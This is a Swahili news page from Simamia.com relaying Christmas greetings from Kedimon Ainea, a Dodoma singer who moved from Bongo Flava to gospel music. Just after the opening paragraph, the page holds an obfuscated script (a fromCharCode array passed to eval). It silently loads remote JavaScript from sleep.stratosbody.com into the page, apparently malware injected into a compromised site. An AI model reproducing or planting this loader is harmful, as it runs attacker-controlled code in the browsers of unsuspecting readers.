Recent Comments

Salaam za Krismass Toka Kwa Mwanamziki

<p>Mwanamziki wa Bongo Flava (zamani), Gospel kwa sasa - Anawatakieni Krismasi njema </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mwanamziki wa Bongo Flava (zamani), Gospel kwa sasa – Anawatakieni Krismasi njema

Kedimon Ainea wa Dodoma, mfatiliaji wa programs za Simamiatv na Simamia.com, amewasiliana na Simamia.com kutuma salaam za Krismasi kwa rafiki, ndugu, na wale wanaomfatilia kazi zake. Kwa hapo nyuma, Ainea alituimbuza sana kwenye mziki wa kizazi kipya maarufu kama Bongo Flava kwa hapo zamani. Baada ya kumpokea Bwana Yesi kama mwokozi wake, kwa sasa Ainea anatumia karama yake ya uimbaji kumtukuza Bwana Yesu. “Kwa sasa mimi ni Mwinjilist na Mchungaji” kwa hiyo nadunda na Yesu tuu.

Ainea ni mzaliwa wa Dodoma na anashukuru Mungu kwa kumlinda na kufikia umri alionao leo. Katika “ujana wangu nilipitia mengi na nilitengeneza marafiki wengi na nawapenda. Nashukuru kujuana na kukutana na watu wa aina mbali mbali” kwa hiyo nimependa kuendeleza tabia ya kila mwaka ya kutuma salaam kwa ndugu na jamaa zangu kupitia simamia.com, aliambia Simamia.

Alipoulizwa angependa kutuma ujumbe gani, Ainea alisema anahitaji kuona kila anayesoma soma huu ujumbe anampokea Bwana Yesu kwani “kumtumikia Mungu kuna faida”.

 

Kwa upande wa ulaji, Ainea hupendelea kula ugali na mlenda.

 

Zifatazo ni baadhi ya kazi za kimziki Ainea alizotaka zifikie wale wanaofatilia kazi zake.

Usinipite by Ainea

 

Naomba by Ainea

 

 

 

By Kabwamunyuma G Mhulo

Kwa jina naitwa Daudi Msafiri ( David) na ni communication na investigator research wa Simamia Media Group kwa upande wa Europe na Africa. Nimekua na Simamia kwa muda wa miaka sita na nafurahia changamoto ninazokutana nazo kazini. Najifunza mengi na nimepata nafasi inayoniwezesha kusafiri.